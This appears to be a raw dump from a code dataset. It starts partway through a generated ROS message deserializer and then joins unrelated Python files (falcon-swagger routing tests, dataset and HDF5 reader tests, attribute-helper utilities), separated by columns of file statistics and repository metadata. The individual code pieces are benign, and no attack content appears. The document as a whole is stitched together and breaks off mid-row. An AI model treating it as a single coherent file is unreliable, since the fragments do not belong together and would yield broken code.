buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
_x = self
buff.write(_struct_2i.pack(_x.processing_time.data.secs, _x.processing_time.data.nsecs))
except struct.error as se: self._check_types(se)
except TypeError as te: self._check_types(te)
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.grid is None:
self.grid = objdetect_msgs.msg.Grid()
if self.scores is None:
self.scores = sensor_msgs.msg.MatND()
if self.mask is None:
self.mask = sensor_msgs.msg.MatND()
if self.processing_time is None:
self.processing_time = std_msgs.msg.Duration()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
_x = self
start = end
end += 53
(_x.grid.minX, _x.grid.minY, _x.grid.strideX, _x.grid.strideY, _x.grid.minW, _x.grid.minH, _x.grid.strideW, _x.grid.strideH, _x.grid.fixAspect, _x.scores.header.seq, _x.scores.header.stamp.secs, _x.scores.header.stamp.nsecs,) = _struct_6I2dB3I.unpack(str[start:end])
self.grid.fixAspect = bool(self.grid.fixAspect)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.header.frame_id = str[start:end].decode('utf-8')
else:
self.scores.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.scores.sizes = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.encoding = str[start:end].decode('utf-8')
else:
self.scores.encoding = str[start:end]
start = end
end += 1
(self.scores.is_bigendian,) = _struct_B.unpack(str[start:end])
self.scores.is_bigendian = bool(self.scores.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.scores.data = str[start:end].decode('utf-8')
else:
self.scores.data = str[start:end]
_x = self
start = end
end += 12
(_x.mask.header.seq, _x.mask.header.stamp.secs, _x.mask.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.header.frame_id = str[start:end].decode('utf-8')
else:
self.mask.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%si'%length
start = end
end += struct.calcsize(pattern)
self.mask.sizes = numpy.frombuffer(str[start:end], dtype=numpy.int32, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.encoding = str[start:end].decode('utf-8')
else:
self.mask.encoding = str[start:end]
start = end
end += 1
(self.mask.is_bigendian,) = _struct_B.unpack(str[start:end])
self.mask.is_bigendian = bool(self.mask.is_bigendian)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.mask.data = str[start:end].decode('utf-8')
else:
self.mask.data = str[start:end]
_x = self
start = end
end += 8
(_x.processing_time.data.secs, _x.processing_time.data.nsecs,) = _struct_2i.unpack(str[start:end])
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_3I = struct.Struct("<3I")
_struct_B = struct.Struct("<B")
_struct_6I2dB3I = struct.Struct("<6I2dB3I")
_struct_2i = struct.Struct("<2i")
| 35.763602
| 272
| 0.625433
| 2,700
| 19,062
| 4.260741
| 0.107407
| 0.076495
| 0.059284
| 0.044332
| 0.755911
| 0.751912
| 0.726182
| 0.723053
| 0.716273
| 0.707406
| 0
| 0.012231
| 0.232242
| 19,062
| 532
| 273
| 35.830827
| 0.77383
| 0.078691
| 0
| 0.806867
| 1
| 0.002146
| 0.15934
| 0.024766
| 0
| 0
| 0.000575
| 0
| 0
| 1
| 0.012876
| false
| 0
| 0.015021
| 0
| 0.049356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9d90277b5d6a0a43ae86f051ea8f839ec2cbb0c6
| 68
|
py
|
Python
|
celertix/configs/__init__.py
|
BALAVIGNESHDOSTRIX/celertix-framework
|
a3d9a530431cbdecf9686fe34fbe3c8d3265327e
|
[
"MIT"
] | 2
|
2020-12-19T14:17:25.000Z
|
2021-08-03T10:20:21.000Z
|
celertix/configs/__init__.py
|
BALAVIGNESHDOSTRIX/celertix-framework
|
a3d9a530431cbdecf9686fe34fbe3c8d3265327e
|
[
"MIT"
] | 12
|
2021-02-08T21:02:14.000Z
|
2022-03-12T00:52:27.000Z
|
celertix/configs/__init__.py
|
BALAVIGNESHDOSTRIX/celertix-framework
|
a3d9a530431cbdecf9686fe34fbe3c8d3265327e
|
[
"MIT"
] | 1
|
2021-04-08T15:32:32.000Z
|
2021-04-08T15:32:32.000Z
|
from . import celertix_dbconfig
from . import celertix_module_config
| 34
| 36
| 0.867647
| 9
| 68
| 6.222222
| 0.666667
| 0.357143
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102941
| 68
| 2
| 36
| 34
| 0.918033
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d19da063a4cd8370784e0f371920df5e37dfcfaf
| 18,222
|
py
|
Python
|
tests/unit/base/models/test_base.py
|
dutradda/falcon-swagger
|
aaba9175817b18662194dc67091e31ec70664012
|
[
"MIT"
] | 14
|
2016-11-01T17:57:09.000Z
|
2021-03-09T12:43:38.000Z
|
tests/unit/base/models/test_base.py
|
dutradda/falcon-swagger
|
aaba9175817b18662194dc67091e31ec70664012
|
[
"MIT"
] | 1
|
2016-11-30T13:08:56.000Z
|
2017-01-16T00:13:40.000Z
|
tests/unit/base/models/test_base.py
|
dutradda/falcon-swagger
|
aaba9175817b18662194dc67091e31ec70664012
|
[
"MIT"
] | 5
|
2016-11-01T16:24:09.000Z
|
2018-06-06T01:20:57.000Z
|
# MIT License
# Copyright (c) 2016 Diogo Dutra
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from falconswagger.models.orm.redis_base import ModelRedisBaseMeta, ModelRedisBase
from falconswagger.router import ModelRouter
from falconswagger.exceptions import ModelBaseError
from falcon.errors import HTTPNotFound, HTTPMethodNotAllowed
from jsonschema import ValidationError
from unittest import mock
import pytest
class TestModelBaseErrors(object):
def test_without_schema_and_without_key(self):
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {})
assert model.__key__ == 'test'
assert not hasattr(model, '__schema__')
def test_without_schema_and_with_key(self):
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__key__': 'test123'})
assert model.__key__ == 'test123'
def test_with_schema_without_operation_id(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}}
}
}
}
with pytest.raises(ValidationError) as exc_info:
ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
assert exc_info.value.message == "'operationId' is a required property"
def test_with_schema_with_operation_with_parameters_with_invalid_operationId(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'test',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array'
}]
}
}
}
with pytest.raises(ModelBaseError) as exc_info:
ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
assert exc_info.value.args[0] == "'operationId' 'test' was not found"
def test_raises_method_not_allowed_error(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array'
}]
}
}
}
req = mock.MagicMock(path='/test', method='GET')
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
router = ModelRouter()
router.add_model(model)
with pytest.raises(HTTPMethodNotAllowed) as exc_info:
route, _ = router.get_route_and_params(req)
assert exc_info.value.headers == {'Allow': 'POST, OPTIONS'} or \
exc_info.value.headers == {'Allow': 'OPTIONS, POST'}
class TestModelBaseBuildsQueryStringParameters(object):
def test_if_operation_builds_query_string_parameters_with_array_without_items_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array'
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': '1,2,3,4'},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_query_string_parameters_with_array_without_items_as_list(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array'
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': ['1', '2', '3', '4']},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_query_string_parameters_with_array_with_items_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array',
'items': {}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': '1,2,3,4'},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_query_string_parameters_with_array_with_items_with_type_as_list(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array',
'items': {'type': 'number'}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': ['1', '2', '3', '4']},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': [1., 2., 3., 4.]}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_query_string_parameters_with_array_with_items_with_type_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'query',
'type': 'array',
'items': {'type': 'number'}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
params={'test': '1,2,3,4'},
path='/test',
method='POST')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': [1., 2., 3., 4.]}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
class TestModelBaseBuildsUriTemplateParameters(object):
def test_if_operation_builds_uri_template_parameters_with_array_without_items_as_string(self):
schema = {
'/test': {
'get': {
'responses': {'200': {'description': 'test'}},
'operationId': 'get_by_uri_template',
'parameters': [{
'name': 'test',
'in': 'path',
'required': True,
'type': 'array'
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.get = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='GET')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp, **{'test': '1,2,3,4'})
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.get.call_args_list == [
mock.call(req.context['session'], kwargs_expected)
]
def test_if_operation_builds_uri_template_parameters_with_array_with_items_as_string(self):
schema = {
'/test': {
'get': {
'responses': {'200': {'description': 'test'}},
'operationId': 'get_by_uri_template',
'parameters': [{
'name': 'test',
'in': 'path',
'required': True,
'type': 'array',
'items': {}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.get = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='GET')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp, **{'test': '1,2,3,4'})
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.get.call_args_list == [
mock.call(req.context['session'], kwargs_expected)
]
def test_if_operation_builds_uri_template_parameters_with_array_with_items_with_type_as_string(self):
schema = {
'/test': {
'get': {
'responses': {'200': {'description': 'test'}},
'operationId': 'get_by_uri_template',
'parameters': [{
'name': 'test',
'in': 'path',
'required': True,
'type': 'array',
'items': {'type': 'number'}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.get = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='GET')
req.get_header.return_value = None
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp, **{'test': '1,2,3,4'})
kwargs_expected = {'test': [1., 2., 3., 4.]}
assert model.get.call_args_list == [
mock.call(req.context['session'], kwargs_expected)
]
class TestModelBaseBuildsHeadersParameters(object):
def test_if_operation_builds_headers_parameters_with_array_without_items_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'header',
'type': 'array'
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='POST')
req.get_header.return_value = '1,2,3,4'
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert req.get_header.call_args_list == [mock.call('test')]
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_headers_parameters_with_array_with_items_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'header',
'type': 'array',
'items': {}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='POST')
req.get_header.return_value = '1,2,3,4'
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': ['1', '2', '3', '4']}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
def test_if_operation_builds_headers_parameters_with_array_with_items_with_type_as_string(self):
schema = {
'/test': {
'post': {
'responses': {'200': {'description': 'test'}},
'operationId': 'post_by_body',
'parameters': [{
'name': 'test',
'in': 'header',
'type': 'array',
'items': {'type': 'number'}
}]
}
}
}
model = ModelRedisBaseMeta('TestModel', (ModelRedisBase,), {'__schema__': schema})
model.insert = mock.MagicMock(return_value=[{}])
req = mock.MagicMock(
context={'session': mock.MagicMock()},
path='/test',
method='POST')
req.get_header.return_value = '1,2,3,4'
resp = mock.MagicMock()
router = ModelRouter()
router.add_model(model)
route, _ = router.get_route_and_params(req)
route(req, resp)
kwargs_expected = {'test': [1., 2., 3., 4.]}
assert model.insert.call_args_list == [
mock.call(req.context['session'], req.context['parameters']['body'], **kwargs_expected)
]
| 38.852878
| 105
| 0.510207
| 1,655
| 18,222
| 5.367976
| 0.118429
| 0.065849
| 0.007429
| 0.009905
| 0.802679
| 0.789847
| 0.761932
| 0.754615
| 0.74955
| 0.739757
| 0
| 0.011939
| 0.351882
| 18,222
| 468
| 106
| 38.935897
| 0.740305
| 0.058336
| 0
| 0.768116
| 0
| 0
| 0.135815
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 1
| 0.038647
| false
| 0
| 0.016908
| 0
| 0.065217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae17fcc9b6182fe294fc511fff4c5eb6e688d2de
| 7,833
|
py
|
Python
|
app/backend/core/dataset/dataset_test.py
|
SummaLabs/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 32
|
2017-09-04T17:40:39.000Z
|
2021-02-16T23:08:34.000Z
|
app/backend/core/dataset/dataset_test.py
|
AymanNabih/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 3
|
2017-10-09T12:52:54.000Z
|
2020-06-29T02:48:38.000Z
|
app/backend/core/dataset/dataset_test.py
|
AymanNabih/DLS
|
2adba47430b456ad0f324e4c8883a896a23b3fbf
|
[
"MIT"
] | 20
|
2017-10-07T17:29:50.000Z
|
2021-01-23T22:01:54.000Z
|
import shutil, tempfile
import skimage.io as skimgio
from input import Input, Schema, CategoricalColumnMetadata
from img2d import Img2DColumn
from dataset import Dataset, RecordWriter, RecordReader
import unittest
import os
import numpy as np
from input_test import create_test_data
from input_test import categories
def create_test_dataset(test_dir, test_csv_file_path, dataset_name, header=False, is_related_path=False):
col_0 = 'col_0'
col_1 = 'col_1'
col_5 = 'col_5'
if header:
col_0 = 'col_0_h'
col_1 = 'col_1_h'
col_5 = 'col_5_h'
schema = Schema.from_csv(csv_path=test_csv_file_path, header=header)
schema.merge_columns_in_range('col_vector', (2, 4))
input = Input(schema)
input.add_categorical_column(col_0)
input.add_numeric_column(col_1)
input.add_vector_column('col_vector')
img2d = Img2DColumn(is_related_path=is_related_path)
input.add_column(col_5, img2d)
return Dataset.Builder(input, dataset_name, test_dir, parallelism_level=2).build()
class TestDataSetBuilder(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.test_csv_file_path, self.test_img_file_path = create_test_data(self.test_dir, 10)
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_process_csv_file(self):
schema = Schema.from_csv(csv_path=self.test_csv_file_path)
input = Input(schema)
input.add_categorical_column('col_0')
rows = Dataset.Builder(input=input, name="test", root_dir=self.test_dir, parallelism_level=2)._process_csv_files()
self.assertEqual(len(rows), 10)
for column in input.columns:
if column.name == 'col_0':
self.assertTrue(len(column.metadata.categories), 4)
def test_build_dataset_absolute_path(self):
dataset = create_test_dataset(self.test_dir, self.test_csv_file_path, "test_dataset_name")
metadata = dataset.metadata
self.assertEqual(metadata.records_count, 10)
self.assertTrue(metadata.size > 0)
data = dataset.get_train_batch(5)
categories_vector = data['col_0']
# Check that for the same record there are the same values in vectors as we assign it in csv file
float_vector = data['col_1']
col_vector = data['col_vector']
self.assertEqual(col_vector[0, 0], col_vector[0, 1])
self.assertEqual(col_vector[0, 0], float_vector[0])
# Load dataset
dataset = Dataset.load(dataset._path)
metadata = dataset.metadata
self.assertEqual(metadata.records_count, 10)
self.assertTrue(metadata.size > 0)
data = dataset.get_train_batch(5)
# Check that for the same record there are the same values in vectors as we assign it in csv file
float_vector = data['col_1']
col_vector = data['col_vector']
self.assertEqual(col_vector[0, 0], col_vector[0, 1])
self.assertEqual(col_vector[0, 0], float_vector[0])
def test_build_dataset_related_path_header_true(self):
test_csv_file_path, test_img_file_path = create_test_data(self.test_dir, 10, header=True, is_related_path=True)
dataset = create_test_dataset(self.test_dir, test_csv_file_path, "test_dataset_name", header=True, is_related_path=True)
metadata = dataset.metadata
self.assertEqual(metadata.records_count, 9)
self.assertTrue(metadata.size > 0)
data = dataset.get_train_batch(5)
categories_vector = data['col_0_h']
# Check that for the same record there are the same values in vectors as we assign it in csv file
float_vector = data['col_1_h']
col_vector = data['col_vector']
self.assertEqual(col_vector[0, 0], col_vector[0, 1])
self.assertEqual(col_vector[0, 0], float_vector[0])
# Load dataset
dataset = Dataset.load(dataset._path)
metadata = dataset.metadata
self.assertEqual(metadata.records_count, 9)
self.assertTrue(metadata.size > 0)
data = dataset.get_train_batch(5)
# Check that for the same record there are the same values in vectors as we assign it in csv file
float_vector = data['col_1_h']
col_vector = data['col_vector']
self.assertEqual(col_vector[0, 0], col_vector[0, 1])
self.assertEqual(col_vector[0, 0], float_vector[0])
class TestHDF5RecordWriterReader(unittest.TestCase):
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.test_csv_file_path, self.test_img_file_path = create_test_data(self.test_dir, 10)
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_write_read_record_raw_img_true(self):
schema = Schema.from_csv(csv_path=self.test_csv_file_path)
schema.merge_columns_in_range('col_vector', (2, 4))
input = Input(schema)
input.add_categorical_column('col_0')
for column in input.columns:
if column.name == 'col_0':
metadata = CategoricalColumnMetadata()
metadata._categories = categories
column.metadata = metadata
input.add_numeric_column('col_1')
input.add_vector_column('col_vector')
img2d = Img2DColumn(pre_transforms=[], post_transforms=[], is_raw_img=True)
input.add_column("col_5", img2d)
os.makedirs(os.path.join(self.test_dir, Dataset.DATA_DIR_NAME))
record_writer = RecordWriter.factory('HDF5', self.test_dir, input.columns)
csv_row = [ent.strip() for ent in Schema.read_n_rows(csv_file_path=self.test_csv_file_path, delimiter=",", rows_number=1)[0]]
precessed_row = {}
for column in input.columns:
precessed_row[column.name] = column.process_on_write(csv_row)
record_writer.write(precessed_row, 0)
record_reader = RecordReader.factory('HDF5', self.test_dir)
record = record_reader.read(0)
data = {}
for column in input.columns:
data[column.name] = column.process_on_read(record)
img_deserialized = data['col_5']
img_original = skimgio.imread(self.test_img_file_path)
self.assertTrue(np.array_equal(img_deserialized, img_original))
def test_write_read_record_raw_img_false(self):
schema = Schema.from_csv(csv_path=self.test_csv_file_path)
schema.merge_columns_in_range('col_vector', (2, 4))
input = Input(schema)
input.add_categorical_column('col_0')
for column in input.columns:
if column.name == 'col_0':
metadata = CategoricalColumnMetadata()
metadata._categories = categories
column.metadata = metadata
input.add_numeric_column('col_1')
input.add_vector_column('col_vector')
img2d = Img2DColumn(pre_transforms=[], post_transforms=[], is_raw_img=False)
input.add_column("col_5", img2d)
os.makedirs(os.path.join(self.test_dir, Dataset.DATA_DIR_NAME))
record_writer = RecordWriter.factory('HDF5', self.test_dir, input.columns)
csv_row = [ent.strip() for ent in Schema.read_n_rows(csv_file_path=self.test_csv_file_path, delimiter=",", rows_number=1)[0]]
precessed_row = {}
for column in input.columns:
precessed_row[column.name] = column.process_on_write(csv_row)
record_writer.write(precessed_row, 0)
record_reader = RecordReader.factory('HDF5', self.test_dir)
record = record_reader.read(0)
data = {}
for column in input.columns:
data[column.name] = column.process_on_read(record)
img_deserialized = data['col_5']
img_original = skimgio.imread(self.test_img_file_path)
self.assertTrue(np.array_equal(img_deserialized, img_original))
if __name__ == '__main__':
unittest.main()
| 46.076471
| 133
| 0.686455
| 1,085
| 7,833
| 4.652535
| 0.115207
| 0.045959
| 0.034865
| 0.035658
| 0.842908
| 0.833399
| 0.804081
| 0.768621
| 0.768621
| 0.759707
| 0
| 0.018856
| 0.214605
| 7,833
| 170
| 134
| 46.076471
| 0.801691
| 0.052215
| 0
| 0.711409
| 0
| 0
| 0.039903
| 0
| 0
| 0
| 0
| 0
| 0.134228
| 1
| 0.067114
| false
| 0
| 0.067114
| 0
| 0.154362
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ae1e243513e231576c3137c7bc926a3beb4909f8
| 2,334
|
py
|
Python
|
scitwi/utils/attrs.py
|
vahndi/scitwi
|
e873ea8b21710fd7b9a1cec0da594ccef91c54a2
|
[
"MIT"
] | null | null | null |
scitwi/utils/attrs.py
|
vahndi/scitwi
|
e873ea8b21710fd7b9a1cec0da594ccef91c54a2
|
[
"MIT"
] | null | null | null |
scitwi/utils/attrs.py
|
vahndi/scitwi
|
e873ea8b21710fd7b9a1cec0da594ccef91c54a2
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from scitwi.utils.misc import get_datetime
def bool_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: bool
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return None
def datetime_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: datetime
"""
if attr_dict_key in attr_dict.keys():
return get_datetime(attr_dict[attr_dict_key])
return None
def dict_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: dict
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return {}
def int_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: int
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return None
def float_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: float
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return None
def str_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: str
"""
if attr_dict is None:
return ''
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return ''
def list_obj_attr(attr_dict: dict, attr_dict_key: str, obj_type: type):
if attr_dict_key in attr_dict.keys() and attr_dict[attr_dict_key] is not None:
return [obj_type(v) for v in attr_dict[attr_dict_key]]
return []
def list_int_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: List[int]
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return []
def list_float_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: List[float]
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return []
def list_str_attr(attr_dict: dict, attr_dict_key: str):
"""
:rtype: List[str]
"""
if attr_dict_key in attr_dict.keys():
return attr_dict[attr_dict_key]
return []
def obj_attr(attr_dict: dict, attr_dict_key: str, obj_type: type):
if attr_dict is None:
return None
if attr_dict_key in attr_dict.keys():
if attr_dict[attr_dict_key] is not None:
return obj_type(attr_dict[attr_dict_key])
return None
| 22.882353
| 82
| 0.655099
| 363
| 2,334
| 3.859504
| 0.07989
| 0.411135
| 0.274804
| 0.256959
| 0.907209
| 0.907209
| 0.882941
| 0.862241
| 0.785153
| 0.686652
| 0
| 0
| 0.239931
